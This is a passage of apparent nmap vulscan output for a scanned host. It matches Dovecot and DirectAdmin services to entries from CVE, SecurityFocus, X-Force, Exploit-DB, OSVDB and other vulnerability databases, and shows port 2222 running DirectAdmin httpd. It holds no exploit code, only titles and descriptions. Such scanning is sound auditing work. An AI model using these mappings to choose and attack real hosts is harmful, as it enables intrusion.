17356| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
17357| [30268] Timo Sirainen Dovecot 1.0/1.0 Beta2/1.0 Beta3/1.0 Beta7 directory traversal
17358| [30021] Jbmc Software DirectAdmin 1.26.6 cross site scripting
17359|
17360| MITRE CVE - https://cve.mitre.org:
17361| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
17362| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
17363| [CVE-2011-5033] Stack-based buffer overflow in CFS.c in ConfigServer Security & Firewall (CSF) before 5.43, when running on a DirectAdmin server, allows local users to cause a denial of service (crash) via a long string in an admin.list file.
17364| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
17365| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
17366| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
17367| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
17368| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
17369| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
17370| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
17371| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
17372| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
17373| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
17374| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
17375| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
17376| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
17377| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
17378| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
17379| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
17380| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
17381| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
17382| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
17383| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
17384| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
17385| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
17386| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
17387| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
17388| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
17389| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
17390| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
17391| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
17392| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
17393| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
17394| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
17395| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
17396| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
17397| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
17398| [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
17399| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
17400| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
17401| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
17402| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
17403| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
17404| [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
17405| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
17406| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
17407| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
17408| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
17409| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
17410|
17411| SecurityFocus - https://www.securityfocus.com/bid/:
17412| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
17413| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
17414| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
17415| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
17416| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
17417| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
17418| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
17419| [67306] Dovecot Denial of Service Vulnerability
17420| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
17421| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
17422| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
17423| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
17424| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
17425| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
17426| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
17427| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
17428| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
17429| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
17430| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
17431| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
17432| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
17433| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
17434| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
17435| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
17436| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
17437| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
17438| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
17439| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
17440| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
17441| [39838] tpop3d Remote Denial of Service Vulnerability
17442| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
17443| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
17444| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
17445| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
17446| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
17447| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
17448| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
17449| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
17450| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
17451| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
17452| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
17453| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
17454| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
17455| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
17456| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
17457| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
17458| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
17459| [23254] DirectAdmin Logfile HTML Injection Vulnerability
17460| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
17461| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
17462| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
17463| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
17464| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
17465| [17961] Dovecot Remote Information Disclosure Vulnerability
17466| [16672] Dovecot Double Free Denial of Service Vulnerability
17467| [8495] akpop3d User Name SQL Injection Vulnerability
17468| [8473] Vpop3d Remote Denial Of Service Vulnerability
17469| [3990] ZPop3D Bad Login Logging Failure Vulnerability
17470| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
17471|
17472| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17473| [86382] Dovecot POP3 Service denial of service
17474| [85490] DirectAdmin Backup System email account functionality symlink
17475| [85488] DirectAdmin Backup System symlink
17476| [84396] Dovecot IMAP APPEND denial of service
17477| [80453] Dovecot mail-search.c denial of service
17478| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
17479| [72685] DirectAdmin domain parameter cross-site request forgery
17480| [71354] Dovecot SSL Common Name (CN) weak security
17481| [67675] Dovecot script-login security bypass
17482| [67674] Dovecot script-login directory traversal
17483| [67589] Dovecot header name denial of service
17484| [67254] DirectAdmin MySQL information disclosure
17485| [67253] DirectAdmin hard link privilege escalation
17486| [63267] Apple Mac OS X Dovecot information disclosure
17487| [62340] Dovecot mailbox security bypass
17488| [62339] Dovecot IMAP or POP3 denial of service
17489| [62256] Dovecot mailbox security bypass
17490| [62255] Dovecot ACL entry security bypass
17491| [60639] Dovecot ACL plugin weak security
17492| [57267] Apple Mac OS X Dovecot Kerberos security bypass
17493| [56875] DirectAdmin name cross-site scripting
17494| [56763] Dovecot header denial of service
17495| [55181] DirectAdmin account cross-site request forgery
17496| [54363] Dovecot base_dir privilege escalation
17497| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
17498| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
17499| [50167] DirectAdmin CMD_DB command execution
17500| [49416] DirectAdmin CMD_DB backup action symlink
17501| [46323] Dovecot dovecot.conf information disclosure
17502| [46227] Dovecot message parsing denial of service
17503| [45669] Dovecot ACL mailbox security bypass
17504| [45667] Dovecot ACL plugin rights security bypass
17505| [41085] Dovecot TAB characters authentication bypass
17506| [41009] Dovecot mail_extra_groups option unauthorized access
17507| [39342] Dovecot LDAP auth cache configuration security bypass
17508| [36510] DirectAdmin user parameter cross-site scripting
17509| [35767] Dovecot ACL plugin security bypass
17510| [35177] DirectAdmin domain parameter cross-site scripting
17511| [34082] Dovecot mbox-storage.c directory traversal
17512| [33390] DirectAdmin log file cross-site scripting
17513| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
17514| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
17515| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
17516| [26578] Cyrus IMAP pop3d buffer overflow
17517| [26536] Dovecot IMAP LIST information disclosure
17518| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
17519| [24709] Dovecot APPEND command denial of service
17520| [13018] akpop3d authentication code SQL injection
17521| [7345] Slackware Linux imapd and ipop3d core dump
17522| [6269] imap, ipop2d and ipop3d buffer overflows
17523| [5923] Linuxconf vpop3d symbolic link
17524| [4918] IPOP3D, Buffer overflow attack
17525| [1560] IPOP3D, user login successful
17526| [1559] IPOP3D user login to remote host successful
17527| [1525] IPOP3D, user logout
17528| [1524] IPOP3D, user auto-logout
17529| [1523] IPOP3D, user login failure
17530| [1522] IPOP3D, brute force attack
17531| [1521] IPOP3D, user kiss of death logout
17532| [418] pop3d mktemp creates insecure temporary files
17533|
17534| Exploit-DB - https://www.exploit-db.com:
17535| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
17536| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
17537| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
17538| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17539| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
17540| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17541| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
17542| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
17543| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
17544| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
17545| [23053] Vpop3d Remote Denial of Service Vulnerability
17546| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
17547| [11893] tPop3d 1.5.3 DoS
17548| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
17549| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
17550| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
17551| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
17552| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
17553| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
17554| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
17555|
17556| OpenVAS (Nessus) - http://www.openvas.org:
17557| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
17558| [901025] Dovecot Version Detection
17559| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
17560| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
17561| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
17562| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
17563| [870607] RedHat Update for dovecot RHSA-2011:0600-01
17564| [870471] RedHat Update for dovecot RHSA-2011:1187-01
17565| [870153] RedHat Update for dovecot RHSA-2008:0297-02
17566| [863272] Fedora Update for dovecot FEDORA-2011-7612
17567| [863115] Fedora Update for dovecot FEDORA-2011-7258
17568| [861525] Fedora Update for dovecot FEDORA-2007-664
17569| [861394] Fedora Update for dovecot FEDORA-2007-493
17570| [861333] Fedora Update for dovecot FEDORA-2007-1485
17571| [860845] Fedora Update for dovecot FEDORA-2008-9202
17572| [860663] Fedora Update for dovecot FEDORA-2008-2475
17573| [860169] Fedora Update for dovecot FEDORA-2008-2464
17574| [860089] Fedora Update for dovecot FEDORA-2008-9232
17575| [840950] Ubuntu Update for dovecot USN-1295-1
17576| [840668] Ubuntu Update for dovecot USN-1143-1
17577| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
17578| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
17579| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
17580| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
17581| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
17582| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
17583| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
17584| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
17585| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
17586| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
17587| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
17588| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
17589| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
17590| [70259] FreeBSD Ports: dovecot
17591| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
17592| [66522] FreeBSD Ports: dovecot
17593| [65010] Ubuntu USN-838-1 (dovecot)
17594| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
17595| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
17596| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
17597| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
17598| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
17599| [62854] FreeBSD Ports: dovecot-managesieve
17600| [61916] FreeBSD Ports: dovecot
17601| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
17602| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
17603| [60528] FreeBSD Ports: dovecot
17604| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
17605| [60089] FreeBSD Ports: dovecot
17606| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
17607| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
17608|
17609| SecurityTracker - https://www.securitytracker.com:
17610| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
17611| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
17612| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
17613| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
17614|
17615| OSVDB - http://www.osvdb.org:
17616| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
17617| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
17618| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
17619| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
17620| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
17621| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
17622| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
17623| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
17624| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
17625| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
17626| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
17627| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
17628| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
17629| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
17630| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
17631| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
17632| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
17633| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
17634| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
17635| [66113] Dovecot Mail Root Directory Creation Permission Weakness
17636| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
17637| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
17638| [66110] Dovecot Multiple Unspecified Buffer Overflows
17639| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
17640| [64783] Dovecot E-mail Message Header Unspecified DoS
17641| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
17642| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
17643| [62796] Dovecot mbox Format Email Header Handling DoS
17644| [61395] DirectAdmin Admin Account Creation CSRF
17645| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
17646| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
17647| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
17648| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
17649| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
17650| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
17651| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
17652| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
17653| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
17654| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
17655| [43137] Dovecot mail_extra_groups Symlink File Manipulation
17656| [42979] Dovecot passdbs Argument Injection Authentication Bypass
17657| [39876] Dovecot LDAP Auth Cache Security Bypass
17658| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
17659| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
17660| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
17661| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
17662| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
17663| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
17664| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
17665| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
17666| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17667| [32673] DirectAdmin CMD_TICKET type Parameter XSS
17668| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17669| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
17670| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
17671| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
17672| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
17673| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
17674| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
17675| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
17676| [23281] Dovecot imap/pop3-login dovecot-auth DoS
17677| [23280] Dovecot Malformed APPEND Command DoS
17678| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
17679| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
17680| [5857] Linux pop3d Arbitrary Mail File Access
17681| [2471] akpop3d username SQL Injection
17682|_
17683 2222/tcp open http syn-ack DirectAdmin httpd 1.53.0 (Registered to Ecatel International Network)
17684|_http-trane-info: Problem with XML parsing of /evox/about
17685| vulscan: VulDB - https://vuldb.com:
17686| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
